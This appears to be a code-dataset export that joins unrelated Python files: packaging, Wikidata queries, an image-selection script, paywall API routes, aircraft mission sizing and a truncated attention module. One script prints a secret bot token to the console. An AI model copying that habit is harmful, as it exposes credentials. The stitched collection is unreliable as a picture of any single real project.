content
stringlengths 5
1.05M
|
---|
#!/usr/bin/env python
from distutils.core import setup
from pinder import __version__
# Distribution metadata collected in one mapping, then handed to setup() at once.
_SETUP_KWARGS = dict(
    name='pinder',
    version=__version__,
    description='Python API for Campfire.',
    license='BSD',
    author='Lawrence Oluyede',
    author_email='[email protected]',
    url='http://dev.oluyede.org/pinder/',
    download_url='http://dev.oluyede.org/download/pinder/0.6.5/',
    packages=['pinder'],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Console',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: POSIX',
        'Programming Language :: Python',
        'Topic :: Communications :: Chat',
        'Topic :: Internet :: WWW/HTTP',
        'Topic :: Software Development :: Libraries',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
)
setup(**_SETUP_KWARGS)
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=no-value-for-parameter
import requests
import pandas as pd
import streamlit as st
import os
import sys
# Make the shared pipeline helpers (path_utils) importable from this script,
# which lives two directories below the repository root.
PIPELINE_DIR = os.path.join(os.path.dirname(__file__), '../../', 'src/pipeline')
sys.path.append(PIPELINE_DIR)
import path_utils
################################################################################
##### Query wikidata for all ISO-3166-1 countries ######
################################################################################
# Wikidata query for ISO-3166-1 codes
# Use at https://query.wikidata.org/
# Workaround for a bug in generating urls for wikidata queries:
# Use the UI at https://query.wikidata.org/ to get the query url by entering these queries
# and then click the "Link" button -> SPARQL endpoint -> copy link address.
# This gives you the url for the query.
# SELECT DISTINCT ?country ?countryLabel ?capital ?capitalLabel
# WHERE
# {
# ?country wdt:P31 wd:Q3624078 .
# #not a former country
# FILTER NOT EXISTS {?country wdt:P31 wd:Q3024240}
# #and no an ancient civilisation (needed to exclude ancient Egypt)
# FILTER NOT EXISTS {?country wdt:P31 wd:Q28171280}
# OPTIONAL { ?country wdt:P36 ?capital } .
#
# SERVICE wikibase:label { bd:serviceParam wikibase:language "en" }
# }
# ORDER BY ?countryLabel
# Pre-built SPARQL endpoint URL for the ISO-3166-1 query (generated with the
# query.wikidata.org "Link" button workaround described above).  It selects
# every current country's two-letter (P297), three-letter (P298) and numeric
# (P299) ISO codes, excluding former countries and ancient civilisations.
iso_3166_1_url = 'https://query.wikidata.org/sparql?query=%23added%20before%202016-10%0ASELECT%20DISTINCT%20%3Fcountry%20%3FcountryLabel%20%3FthreeLetterCode%20%3FnumericCode%20%3FtwoLetterCode%0AWHERE%0A%7B%0A%20%20%3Fcountry%20wdt%3AP298%20%3FthreeLetterCode.%0A%20%20%3Fcountry%20wdt%3AP299%20%3FnumericCode.%0A%20%20%3Fcountry%20wdt%3AP297%20%3FtwoLetterCode.%0A%20%20%23not%20a%20former%20country%0A%20%20FILTER%20NOT%20EXISTS%20%7B%3Fcountry%20wdt%3AP31%20wd%3AQ3024240%7D%0A%20%20%23and%20no%20an%20ancient%20civilisation%20(needed%20to%20exclude%20ancient%20Egypt)%0A%20%20FILTER%20NOT%20EXISTS%20%7B%3Fcountry%20wdt%3AP31%20wd%3AQ28171280%7D%0A%0A%20%20SERVICE%20wikibase%3Alabel%20%7B%20bd%3AserviceParam%20wikibase%3Alanguage%20%22en%22%20%7D%0A%7D%0AORDER%20BY%20%3FcountryLabel' # pylint: disable=line-too-long
# Each SPARQL result binding carries one '<var>.value' field per selected variable.
countries = requests.get(iso_3166_1_url, params={'format': 'json'}).json()['results']['bindings']
country_df = pd.json_normalize(countries)
# Map SPARQL variable names onto the pipeline's column naming scheme.
country_df = country_df.rename(columns={
    'country.value': 'wikidata_id',
    'twoLetterCode.value': 'country_iso_3166-1_alpha-2',
    'numericCode.value': 'country_iso_3166-1_numeric',
    'threeLetterCode.value': 'region_code',
    'countryLabel.value': 'region_name'
})
# Drop the '.type'/'.xml:lang' normalization columns; keep only the data.
country_df = country_df[['wikidata_id', 'country_iso_3166-1_alpha-2', 'country_iso_3166-1_numeric',
                         'region_code', 'region_name']]
# The 'country' value is a full entity URL; keep only the trailing Q-id.
country_df['wikidata_id'] = country_df['wikidata_id'].apply(lambda s: s.split('/')[-1])
# Countries are level-1 regions directly under the synthetic 'WORLD' root.
country_df['region_code_type'] = 'iso_3166-1'
country_df['country_iso_3166-1_alpha-3'] = country_df['region_code']
country_df['region_code_level'] = 1
country_df['parent_region_code'] = 'WORLD'
country_df['subdivision_type'] = 'countries'
country_df['region_type'] = 'country'
# Countries are leaves at level 1; levels 2/3 do not apply here.
country_df['leaf_region_code'] = country_df['region_code']
country_df['level_1_region_code'] = country_df['region_code']
country_df['level_2_region_code'] = None
country_df['level_3_region_code'] = None
st.subheader('Countries including duplicate ISO-3166-1 / ISO-3166-2 regions')
st.write(country_df)
################################################################################
##### Remove duplicates for regions that could appear as either Level 1 ######
##### or as Level 2 regions, based on whether data sources are separate ######
################################################################################
# Treat Netherlands + Aruba + Curaçao + Sint Maarten (Dutch part) as a single level 1 entity
country_df = country_df[country_df['wikidata_id'] != 'Q55']
# Keep Western Sahara wikidata entry (Q6250) instead of Q40362
country_df = country_df[country_df['wikidata_id'] != 'Q40362']
# These regions appear as both ISO-1 and ISO-2, but we will count them as ISO-2
# so we remove them from the ISO-1 list
# Leave as ISO1 because they have separate data sources: Taiwain, Hong Kong, Macao
# Keys are ISO-3166-1 alpha-3 codes; values are human-readable names (the
# values are informational only -- filtering below uses the keys).
regions_to_remove_from_iso1 = {
    'ALA': 'Åland Islands', # Finland: FI-01
    'BLM': 'Saint Barthélemy', # France: FR-BL Saint Barthélemy (BL)
    'GUF': 'French Guiana', # France: FR-GF French Guiana (GF)
    'GLP': 'Guadeloupe', # France: FR-GP Guadeloupe (GP)
    'MAF': 'Saint Martin (French part)', # France: FR-MF Saint Martin (MF)
    'MTQ': 'Martinique', # France: FR-MQ Martinique (MQ)
    'NCL': 'New Caledonia', # France: FR-NC New Caledonia (NC)
    'PYF': 'French Polynesia', # France: FR-PF French Polynesia (PF)
    'SPM': 'Saint Pierre and Miquelon', # France: FR-PM Saint Pierre and Miquelon (PM)
    'REU': 'Réunion', # France: FR-RE Réunion (RE)
    'ATF': 'French Southern and Antarctic Lands', # France: FR-TF French Southern Territories (TF)
    'WLF': 'Wallis and Futuna', # France: FR-WF Wallis and Futuna (WF)
    'MYT': 'Mayotte', # France: FR-YT Mayotte (YT)
    'SJM': 'Svalbard and Jan Mayen', # Norway: NO-21 Svalbard, NO-22 Jan Mayen
    'BES': 'Caribbean Netherlands', # Netherlands: NL-BQ1 Bonaire (BQ), NL-BQ2 Saba (BQ), NL-BQ3 Sint Eustatius (BQ)
    'ABW': 'Aruba', # Netherlands: NL-AW Aruba (AW)
    'CUW': 'Curaçao', # Netherlands: NL-CW Curaçao (CW)
    'SXM': 'Sint Maarten (Dutch part)', # Netherlands: NL-SX Sint Maarten (SX)
    'ASM': 'American Samoa', # United States: US-AS
    'GUM': 'Guam', # United States: US-GU
    'MNP': 'Northern Mariana Islands', # United States: US-MP
    'PRI': 'Puerto Rico', # United States: US-PR
    'UMI': 'United States Minor Outlying Islands', # United States: US-UM
    'VIR': 'United States Virgin Islands', # United States: US-VI
}
# Surface the count in the app so the removal list can be eyeballed.
st.write(len(regions_to_remove_from_iso1))
country_df = country_df[~country_df['region_code'].isin(regions_to_remove_from_iso1.keys())]
st.subheader('Countries without duplicate ISO-3166-1 / ISO-3166-2 regions')
################################################################################
#####     Generate datacommons ids using the known format for the dcids   ######
################################################################################
country_df['datacommons_id'] = country_df.apply(lambda x: 'country/' + x['region_code'], axis=1)
st.write(country_df)
st.write(country_df.shape)
country_df.to_csv(
    os.path.join(path_utils.path_to('locations_intermediate_dir'), 'iso_3166_1_locations.csv'), index=False)
|
##############################################
# The MIT License (MIT)
# Copyright (c) 2018 Kevin Walchko
# see LICENSE for full details
##############################################
# These are IntFlags, so members compare equal to plain ints.
# NOTE: the functional Flag/IntFlag API assigns POWER-OF-TWO values
# (1, 2, 4, 8, ...), not sequential 1..N, so that members can be OR'ed:
#   ZmqType.pub == 1, ZmqType.sub == 2, ZmqType.req == 4, ZmqType.rep == 8
#
from enum import IntFlag
# Operation outcome codes: ok=1, error=2, topic_not_found=4, core_not_found=8,
# multiple_pub_error=16, invalid_zmq_type=32.
Status = IntFlag('Status', 'ok error topic_not_found core_not_found multiple_pub_error invalid_zmq_type')
# ZMQ socket roles: pub=1, sub=2, req=4, rep=8.
ZmqType = IntFlag('ZmqType', 'pub sub req rep')
|
from openpyxl import Workbook, load_workbook
import os
import glob
import json
#directories
#directories
FIGRAM_PATH = '/media/mjia/Data/CNN-fMRI/FIGRIM/SCENES_700x700'
CROPPED_SUN_PATH = '/media/mjia/Data/CNN-fMRI/cropped'
TARGET_PATH = '/media/mjia/Data/CNN-fMRI/Pool'

import subprocess

# Recreate the target pool directory from scratch.
# BUG FIX: the original ran os.popen("rm -r -f" + TARGET_PATH) -- no space
# before the path, producing an invalid command ('rm -r -f/media/...'), so the
# old pool was never removed.  subprocess with an argument list also WAITS for
# completion (os.popen is fire-and-forget, racing with the mkdir/cp below) and
# needs no manual escaping of spaces in paths.
if os.path.isdir(TARGET_PATH):
    subprocess.call(['rm', '-rf', TARGET_PATH])
subprocess.call(['mkdir', '-p', TARGET_PATH])

XLSX_FILE = 'RankSUNDatabase.xlsx'

#: experimental setup constants
NUMBER_OF_PARTICIPANTS = 50
NUMBER_OF_UNIQUE_RUNS = 8
NUMBER_OF_SHARED_RUNS = 1
UNIQUE_IMAGES_PER_UNIQUE_RUN = 56
SHARED_IMAGES_PER_UNIQUE_RUN = 8
SHARED_IMAGES_PER_SHARED_RUN = 64
NUMBER_REQUIRED_OF_PARTICIPANTS = NUMBER_OF_UNIQUE_RUNS * UNIQUE_IMAGES_PER_UNIQUE_RUN

#the records
global_count = 0          # total images pooled so far
subject_level_count = 0   # per-participant image count (floor division per class)
residual_count = 0        # images left over after even division per class
selected_classes = []


def _class_images(base_path, class_label):
    """Return all .jpg files of one class directory under base_path."""
    return glob.glob('{}*.jpg'.format(base_path + os.sep + class_label + os.sep), recursive=True)


def _add_class_to_pool(class_label, source_path, count):
    """Copy a class directory into the pool and log progress."""
    subprocess.call(['cp', '-r', source_path + os.sep + class_label, TARGET_PATH])
    print("add *" + class_label + "* to pool, current has " + str(count))


#select from Figram
for dir_, subdirs, files in os.walk(FIGRAM_PATH):
    for class_label in subdirs:
        all_files = _class_images(FIGRAM_PATH, class_label)
        # if the class contains less than 51 image, do not select it
        # (every participant must be able to get at least one image)
        if len(all_files) <= NUMBER_OF_PARTICIPANTS:
            continue
        global_count += len(all_files)
        subject_level_count += len(all_files) // NUMBER_OF_PARTICIPANTS
        residual_count += len(all_files) % NUMBER_OF_PARTICIPANTS
        selected_classes.append(class_label)
        _add_class_to_pool(class_label, FIGRAM_PATH, global_count)

#select the class in RankSUNDatabase.xlsx
wb = load_workbook(XLSX_FILE)
# NOTE: get_sheet_names()/get_sheet_by_name() are deprecated in openpyxl;
# the sheetnames property and key access are the supported replacements.
worksheet = wb[wb.sheetnames[0]]
for i in range(2, 89):
    class_label = worksheet["A" + str(i)].value.lower()
    #check if it's already selected
    if class_label not in selected_classes:
        all_files = _class_images(CROPPED_SUN_PATH, class_label)
        # if the class contains less than 51 image, do not select it
        if len(all_files) <= NUMBER_OF_PARTICIPANTS:
            continue
        global_count += len(all_files)
        subject_level_count += len(all_files) // NUMBER_OF_PARTICIPANTS
        residual_count += len(all_files) % NUMBER_OF_PARTICIPANTS
        selected_classes.append(class_label)
        _add_class_to_pool(class_label, CROPPED_SUN_PATH, global_count)

#select the class in SUN: largest remaining classes first, until we have
#enough images per participant
sorts = []
for dir_, subdirs, files in os.walk(CROPPED_SUN_PATH):
    for class_label in subdirs:
        if class_label not in selected_classes:
            all_files = _class_images(CROPPED_SUN_PATH, class_label)
            if len(all_files) <= NUMBER_OF_PARTICIPANTS:
                continue
            sorts.append([class_label, len(all_files)])
sorts.sort(key=lambda a: a[1], reverse=True)
for item in sorts:
    class_label, length = item
    global_count += length
    subject_level_count += length // NUMBER_OF_PARTICIPANTS
    residual_count += length % NUMBER_OF_PARTICIPANTS
    selected_classes.append(class_label)
    _add_class_to_pool(class_label, CROPPED_SUN_PATH, global_count)
    if subject_level_count >= NUMBER_REQUIRED_OF_PARTICIPANTS:
        break

# Persist the selection for the downstream experiment code.
with open('info.json', 'w') as outfile:
    json.dump(selected_classes, outfile)
print('done')
# ---------------------------------------
# Program by Orlov.A.
#
#
# Version Date Info
# 1.0 2016 Initial Version
#
# ----------------------------------------
# x = 25
#
# if x == 25:
# print("YES, yo're right")
# else:
# print("NO!!!!!!!!!!!!!!!!!!!!!!!!")
# --- branching demo: classify an age ----------------------------------------
age = 13
if age <= 4:
    print("you are baby!")
elif 4 < age <= 12:
    print("you're kid!")
else:
    print("you will die soon :3")
print("-------------END-----------")

# --- membership demo: which cars are german ---------------------------------
cars = ['bmw', 'vw', 'seat', 'skoda', 'lada']
german_cars = ['bmw', 'vw', 'audi']
for car in cars:
    suffix = " is german car" if car in german_cars else " is not german car"
    print(car + suffix)
# A bytes object is an immutable sequence of ints in 0..255;
# indexing yields the int itself, not a length-1 bytes.
elements = bytes((255,))
print(elements[0])
|
# coding: UTF-8
import setting
# Pull the bot token from the local settings module and echo it for debugging.
TOKEN = setting.TOKEN
print(TOKEN)
## Main source code continues below.
|
# Ideal Gas Force Field
import numpy as np


class IdealGas:
    """Force field of an ideal gas.

    The force evaluated at any configuration ``x`` is identically zero
    (an array of zeros with the same shape as ``x``).
    """

    def __init__(self):
        # No parameters to configure.
        pass

    def __call__(self, x, *args, **kwargs):
        """Return a zero array shaped like ``x``; extra args are ignored."""
        return np.zeros_like(x)
from http import HTTPStatus
from fastapi import Depends, Query
from starlette.exceptions import HTTPException
from lnbits.core.crud import get_user, get_wallet
from lnbits.core.services import check_invoice_status, create_invoice
from lnbits.decorators import WalletTypeInfo, get_key_type
from . import paywall_ext
from .crud import create_paywall, delete_paywall, get_paywall, get_paywalls
from .models import CheckPaywallInvoice, CreatePaywall, CreatePaywallInvoice
@paywall_ext.get("/api/v1/paywalls")
async def api_paywalls(
    wallet: WalletTypeInfo = Depends(get_key_type), all_wallets: bool = Query(False)
):
    """List paywalls of the key's wallet (or all of the user's wallets)."""
    if all_wallets:
        user = await get_user(wallet.wallet.user)
        wallet_ids = user.wallet_ids
    else:
        wallet_ids = [wallet.wallet.id]
    paywalls = await get_paywalls(wallet_ids)
    return [paywall.dict() for paywall in paywalls]
@paywall_ext.post("/api/v1/paywalls")
async def api_paywall_create(
    data: CreatePaywall, wallet: WalletTypeInfo = Depends(get_key_type)
):
    """Create a paywall owned by the key's wallet and return it as a dict."""
    new_paywall = await create_paywall(wallet_id=wallet.wallet.id, data=data)
    return new_paywall.dict()
@paywall_ext.delete("/api/v1/paywalls/{paywall_id}")
async def api_paywall_delete(
    paywall_id, wallet: WalletTypeInfo = Depends(get_key_type)
):
    """Delete a paywall owned by the key's wallet.

    Replies 404 for an unknown paywall, 403 for another wallet's paywall,
    and an empty 204 on success.
    """
    paywall = await get_paywall(paywall_id)
    if not paywall:
        raise HTTPException(
            status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
        )
    if paywall.wallet != wallet.wallet.id:
        raise HTTPException(
            status_code=HTTPStatus.FORBIDDEN, detail="Not your paywall."
        )
    await delete_paywall(paywall_id)
    # lnbits convention: signal success with an empty NO_CONTENT response.
    raise HTTPException(status_code=HTTPStatus.NO_CONTENT)
@paywall_ext.post("/api/v1/paywalls/invoice/{paywall_id}")
async def api_paywall_create_invoice(
    data: CreatePaywallInvoice,
    paywall_id: str = Query(None)
):
    """Create a lightning invoice for a paywall.

    Replies 404 for an unknown paywall, 400 if the requested amount is below
    the paywall's minimum, and 500 if invoice creation fails.
    """
    paywall = await get_paywall(paywall_id)
    # BUG FIX: guard against unknown paywall ids (consistent with the
    # check_invoice endpoint below); previously a missing paywall raised
    # AttributeError and surfaced as an unhandled 500.
    if not paywall:
        raise HTTPException(
            status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
        )
    if data.amount < paywall.amount:
        raise HTTPException(
            status_code=HTTPStatus.BAD_REQUEST,
            detail=f"Minimum amount is {paywall.amount} sat.",
        )
    try:
        # charge at least the paywall's configured minimum
        amount = data.amount if data.amount > paywall.amount else paywall.amount
        payment_hash, payment_request = await create_invoice(
            wallet_id=paywall.wallet,
            amount=amount,
            memo=f"{paywall.memo}",
            extra={"tag": "paywall"},
        )
    except Exception as e:
        raise HTTPException(status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(e))
    return {"payment_hash": payment_hash, "payment_request": payment_request}
@paywall_ext.post("/api/v1/paywalls/check_invoice/{paywall_id}")
async def api_paywal_check_invoice(data: CheckPaywallInvoice, paywall_id: str = Query(None)):
    """Check whether a paywall invoice was paid.

    Returns ``{"paid": False}`` until the payment settles; on success also
    returns the unlocked URL and the paywall's ``remembers`` flag.
    """
    paywall = await get_paywall(paywall_id)
    if not paywall:
        raise HTTPException(
            status_code=HTTPStatus.NOT_FOUND, detail="Paywall does not exist."
        )
    payment_hash = data.payment_hash
    try:
        status = await check_invoice_status(paywall.wallet, payment_hash)
        is_paid = not status.pending
    except Exception:
        # treat any lookup failure as "not paid yet"
        return {"paid": False}
    if not is_paid:
        return {"paid": False}
    # Mark the payment as settled before unlocking the content.
    wallet = await get_wallet(paywall.wallet)
    payment = await wallet.get_payment(payment_hash)
    await payment.set_pending(False)
    return {"paid": True, "url": paywall.url, "remembers": paywall.remembers}
|
from __future__ import division
from warnings import warn
from numpy import sqrt, exp, power, linspace, interp, log, pi
from environment import Atmosphere, G_0
MAX_T_TO_W = 5
class Mission(object):
    """A mission defined by an ordered list of flight segments.

    :param segments: the segments making up the mission (required until a
        mission generator exists)
    :param atmosphere: atmosphere model; a default ``Atmosphere()`` is
        constructed when none is given
    :raises NotImplementedError: if *segments* is omitted
    """

    def __init__(self, segments=None, atmosphere=None, *args, **kwargs):
        self.atmosphere = atmosphere if atmosphere is not None else Atmosphere()
        if segments is None:
            raise NotImplementedError("A mission generator has not been implemented yet, must provide list of segments.")
        self.segments = segments
class Segment(object):
    """
    One leg of an aircraft mission.

    :param kind: the type of segment, e.g., takeoff, cruise, dash, loiter, land
    :param speed: the speed at which the segment is to be flown (knots)
    :param altitude: the altitude at which the segment will take place (ft)
    :param payload_released: weight of payload dropped during this segment
    :param atmosphere: the atmosphere instance that contains the sea level
        conditions; if None is provided, a standard one is created
    :param release: stores released during this segment (removed from the
        aircraft's store list when performance is evaluated)
    :type kind: str
    :type speed: float
    :type altitude: float
    :type atmosphere: ::class::`Atmosphere`

    If mission is of type `cruise` or `dash`:
    :param range: the range to fly during the segment (nmi)
    :type range: float

    If mission is of type `loiter`:
    :param loiter_time: time to loiter (hrs)
    :type loiter_time: float

    Optional keyword arguments: ``weight_fraction``, ``turn_rate`` (rad/s),
    ``turn_radius`` (ft), ``climb_rate``, ``acceleration``.
    """

    # Per-kind default parameters, applied when the segment kind CONTAINS the
    # key (e.g. 'takeoff' matches kind 'takeoff_hot').
    _DEFAULTS = dict(warmup=dict(time=60.0),
                     takeoff=dict(field_length= 1500,
                                  mu=0.05,
                                  time=3,
                                  obstacle_height=100),
                     land=dict(field_length=2500,
                               mu=0.18,
                               time=3,
                               obstacle_height=100),
                     loiter=dict(time=None),
                     )
    # Historical end/start weight fractions used when the caller does not
    # supply one and no fuel-burn estimate is required.
    _WEIGHT_FRACTIONS = dict(warmup=0.99,
                             taxi=0.99,
                             takeoff=0.98,
                             climb=0.95,
                             descend=0.98,
                             land=0.99,
                             )

    def __init__(self, kind, speed, altitude, payload_released=0,
                 atmosphere=None,
                 release=None, *args, **kwargs):
        self.kind = kind
        # Prefer the historical fraction for known kinds unless overridden.
        if 'weight_fraction' not in kwargs and kind in self._WEIGHT_FRACTIONS:
            self._weight_fraction = self._WEIGHT_FRACTIONS[kind]
        else:
            self._weight_fraction = kwargs.pop('weight_fraction', None)
        self.altitude = altitude
        self.payload_released = payload_released
        self.atmosphere = Atmosphere() if atmosphere is None else atmosphere
        self.density = self.atmosphere.density(altitude)
        self.release = release
        if speed is not None:
            self.speed = speed * 1.68780986  # kts to ft/s
            self.mach = self.speed / self.atmosphere.speed_of_sound(altitude)
            self.n = 1  # load factor; raised below for turning segments
            if 'turn_rate' in kwargs:
                turn_rate = kwargs.pop('turn_rate')
                self.n = sqrt(1 + (turn_rate * self.speed / G_0) ** 2)
            if 'turn_radius' in kwargs:
                turn_radius = kwargs.pop('turn_radius')
                n = sqrt(1 + (self.speed / turn_radius / G_0) ** 2)
                # keep the more demanding of the two turn constraints
                if hasattr(self, 'n'):
                    self.n = max(n, self.n)
            self.climb_rate = kwargs.pop('climb_rate', 0)
            self.acceleration = kwargs.pop('acceleration', 0)
            self.dynamic_pressure = 0.5 * self.density * self.speed * self.speed
        # Apply per-kind defaults (caller kwargs win over defaults).
        for key, defaults in self._DEFAULTS.items():
            if key in self.kind:
                for var, default in defaults.items():
                    setattr(self, var, kwargs.pop(var, default))
        if 'cruise' in self.kind or 'dash' in self.kind:
            self.range = kwargs.pop('range')
            self.time = self.range / speed  # nmi / kts -> hours
        if len(kwargs) > 0:
            warn("Unused kwargs: {}".format(kwargs.keys()))

    @property
    def weight_fraction(self):
        """Ratio of segment end weight to segment start weight.

        Returns the fixed historical fraction when one was set; otherwise
        estimates fuel burn from the engine TSFC and the installed
        thrust-to-weight ratio (requires ``thrust_to_weight_required`` to
        have been called first so ``self.aircraft`` et al. are set).
        """
        if self._weight_fraction is not None:
            return self._weight_fraction
        tsfc = self.aircraft.engine.tsfc(
            self.mach, self.altitude, self.afterburner)
        t_to_w = self.aircraft.t_to_w * \
            self.aircraft.thrust_lapse(
                self.altitude, self.mach) / self.prior_weight_fraction
        return 1 - exp(-tsfc * t_to_w * self.time)
        # BUG FIX: removed unreachable legacy code that followed this return
        # (it referenced an undefined name `altitude` and an unfinished
        # expression, and could never execute).

    def thrust_to_weight_required(self, aircraft, wing_loading, prior_weight_fraction=1):
        """Thrust-to-weight ratio required to fly this segment.

        :param aircraft: aircraft model providing aero/engine coefficients
        :param wing_loading: wing loading value(s) W/S to evaluate at
        :param prior_weight_fraction: cumulative weight fraction ("beta")
            at segment start
        :return: required T/W, interpolated per wing loading for takeoff and
            landing, or from the master equation otherwise
        """
        if self.speed == 0:
            # static segment (warmup/taxi): no thrust constraint
            return [0.0] * len(wing_loading) if hasattr(wing_loading, '__iter__') else 0.0
        self.aircraft = aircraft
        self.prior_weight_fraction = prior_weight_fraction
        self.afterburner = self.aircraft.engine.afterburner and 'dash' in self.kind
        aircraft.mach = self.mach
        cd_0 = aircraft.cd_0
        k_1 = aircraft.k_1
        k_2 = aircraft.k_2
        if self.release is not None:
            # stores dropped earlier in the mission no longer add drag
            self.aircraft.stores = [store for store in self.aircraft.stores if store not in self.release]
        alpha = aircraft.thrust_lapse(self.altitude, self.mach)
        beta = self.prior_weight_fraction
        cd_r = aircraft.cd_r
        t_to_w = None
        if 'takeoff' in self.kind:
            aircraft.takeoff  # switch aircraft to takeoff configuration
            k_to = aircraft.k_to
            cl_max = self.aircraft.cl_max
            self.aircraft.cl = cl = cl_max / (k_to * k_to)
            xi = self.aircraft.cd + cd_r - self.mu * self.aircraft.cl
            # Sweep T/W and solve the ground-roll equation for the matching
            # wing loading, then interpolate back onto the requested W/S.
            t_to_w = linspace(0.01, MAX_T_TO_W, 200)
            # BUG FIX: removed a dead assignment to `a` that was immediately
            # overwritten by the expression below.
            a = - (beta / (self.density * G_0 * xi)) * log(1 - xi / ((alpha * t_to_w / beta - self.mu) * cl))
            b = self.time * k_to * sqrt(2 * beta / (self.density * cl_max))
            c = self.field_length
            w_to_s = power((-b + sqrt(b * b + 4 * a * c)) / (2 * a), 2)
            self.aircraft._takeoff = {'w_to_s': w_to_s, 't_to_w': t_to_w, 'a': a, 'b': b, 'c': c}
            return interp(wing_loading, w_to_s, t_to_w)
        if 'land' in self.kind:
            aircraft.landing  # switch aircraft to landing configuration
            k_td = self.aircraft.k_td
            cl_max = self.aircraft.cl_max
            self.aircraft.cl = cl = cl_max / (k_td * k_td)
            if aircraft.reverse_thrust:
                alpha = -alpha
            else:
                alpha = 0.0
            # assume drag chute
            cd_chute = 0.0
            if self.aircraft.drag_chute is not None:
                drag_chute_diam = self.aircraft.drag_chute['diameter']
                drag_chute_cd = self.aircraft.drag_chute['cd']
                try:
                    wing_area = self.aircraft.wing.area
                except AttributeError:
                    wing_area = 500
                    warn("Could not get an area for the wing (self.aircraft.wing.area), assuming 500 sqft")
                cd_chute = drag_chute_cd * 0.25 * drag_chute_diam * drag_chute_diam * pi / wing_area
            xi = self.aircraft.cd + cd_r - self.mu * self.aircraft.cl + cd_chute
            t_to_w = linspace(0.01, MAX_T_TO_W, 200)
            a = (beta / (self.density * G_0 * xi)) * log(1 + xi / ((self.mu + (alpha / beta) * t_to_w) * cl))
            b = self.time * k_td * sqrt(2 * beta / (self.density * cl_max))
            c = self.field_length
            w_to_s = power((-b + sqrt(b * b + 4 * a * c)) / (2 * a), 2)
            self.aircraft._land = {'w_to_s': w_to_s, 't_to_w': t_to_w, 'a': a, 'b': b, 'c': c}
            return interp(wing_loading, w_to_s, t_to_w)
        aircraft.configuration = None
        q = self.dynamic_pressure
        c_l = self.n * beta * wing_loading / q
        excess_power = self.climb_rate / self.speed + self.acceleration / G_0
        # Master Equation from Mattingly, 2002
        return (beta / alpha) * (q / (beta * wing_loading) * (k_1 * c_l * c_l + k_2 * c_l + cd_0 + cd_r) + excess_power)
|
import torch
import torch.nn as nn
from ..utils import ConvModule
from qd3dt.core import bbox_overlaps
class Relations(nn.Module):
    """Grouped relation (attention) module between RoI features.

    Computes multi-head (``groups``) dot-product attention of each input RoI
    feature against a set of reference RoI features, optionally biased by the
    log-IoU of the corresponding boxes, then projects the aggregated features
    back to ``in_channels`` with a grouped 1x1 convolution.
    """

    def __init__(self,
                 in_channels=1024,
                 inter_channels=1024,
                 groups=16,
                 num_embed_convs=1,
                 share_embed_convs=True,
                 with_loc=True):
        super(Relations, self).__init__()
        self.in_channels = in_channels
        self.groups = groups
        self.inter_channels = inter_channels
        # channels must split evenly across attention groups
        assert not in_channels % groups
        self.num_embed_convs = num_embed_convs
        self.share_embed_convs = share_embed_convs
        self.with_loc = with_loc
        self.init_embed_convs()
        # grouped 1x1 projection back to the input channel count
        self.conv_out = ConvModule(
            self.inter_channels * self.groups,
            self.in_channels,
            kernel_size=1,
            activation=None,
            groups=self.groups)

    def init_embed_convs(self):
        """Build the 1x1 embedding convs for the queries (and, when not
        shared, a separate stack for the reference features)."""
        self.embed_convs = nn.ModuleList()
        if not self.share_embed_convs:
            self.ref_embed_convs = nn.ModuleList()
        for i in range(self.num_embed_convs):
            in_channels = self.in_channels if i == 0 else self.inter_channels
            # NOTE(review): two convs are appended per iteration (one with
            # inplace=False, one without); both consume `in_channels` --
            # confirm this is intended rather than one conv per iteration.
            self.embed_convs.append(
                ConvModule(
                    in_channels,
                    self.inter_channels,
                    kernel_size=1,
                    activation='relu',
                    activate_last=False,
                    inplace=False))
            self.embed_convs.append(
                ConvModule(
                    in_channels,
                    self.inter_channels,
                    kernel_size=1,
                    activation='relu',
                    activate_last=False))
            if not self.share_embed_convs:
                self.ref_embed_convs.append(
                    ConvModule(
                        in_channels,
                        self.inter_channels,
                        kernel_size=1,
                        activation='relu',
                        activate_last=False,
                        inplace=False))
                self.ref_embed_convs.append(
                    ConvModule(
                        in_channels,
                        self.inter_channels,
                        kernel_size=1,
                        activation='relu',
                        activate_last=False))

    def forward(self, in_x, rois, in_ref_x=None, ref_rois=None):
        """Relate ``in_x`` RoI features to ``in_ref_x`` reference features.

        x: [N_0, C]   ref_x: [N_1, C]
        rois: [N_0, 4]   ref_rois: [N_1, 4]  (column 0 is the batch index)
        Returns attended features of shape [N_0, C].
        """
        if in_ref_x is None:
            # self-attention: the inputs are their own references
            in_ref_x = in_x
            ref_rois = rois
        N_0, C = in_x.shape
        N_1, C_1 = in_ref_x.shape
        assert C == C_1
        x = in_x.view(N_0, C, 1, 1)
        # BUG FIX: the reference features must be reshaped with their own
        # count N_1 (the original used N_0, which fails whenever a reference
        # set of a different size is supplied).
        ref_x = in_ref_x.view(N_1, C, 1, 1)
        for i, embed_conv in enumerate(self.embed_convs):
            x = embed_conv(x)
            if not self.share_embed_convs:
                ref_x = self.ref_embed_convs[i](ref_x)
            else:
                ref_x = embed_conv(ref_x)
        # [N, G, C // G]
        x = x.view(N_0, self.groups, -1)
        ref_x = ref_x.view(N_1, self.groups, -1)
        # [G, N_0, C // G]
        x = x.permute(1, 0, 2)
        # [G, C // G, N_1]
        ref_x = ref_x.permute(1, 2, 0)
        # [G, N_0, N_1] -- scaled dot-product attention logits per group
        matrix = torch.matmul(x, ref_x)
        matrix /= x.shape[-1]**0.5
        # [N_0, G, N_1]
        matrix = matrix.permute(1, 0, 2)
        if self.with_loc:
            # bias logits by log-IoU so spatially-close boxes attend more
            # [N_0, N_1]
            ious = bbox_overlaps(rois[:, 1:], ref_rois[:, 1:])
            ious = ious.view(N_0, 1, N_1).expand(N_0, self.groups, N_1)
